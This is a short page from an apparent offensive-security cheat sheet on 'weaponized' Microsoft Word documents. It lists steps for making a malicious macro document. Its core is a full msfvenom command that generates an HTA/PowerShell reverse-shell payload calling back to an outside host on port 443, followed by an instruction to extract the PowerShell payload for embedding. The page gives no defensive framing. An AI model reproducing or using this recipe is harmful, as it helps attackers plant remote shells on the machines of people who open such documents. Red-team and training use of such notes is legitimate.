Weaponized Office Docs

MS Word Macro

  1. Create a new Word document

  2. View > Macros > Create

  3. Create a HTA payload using msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=1.1.1.1 LPORT=443 -f hta-psh -o xx.hta

  4. Extract the powershell payload

PreviousEmpireNextCLI

Last updated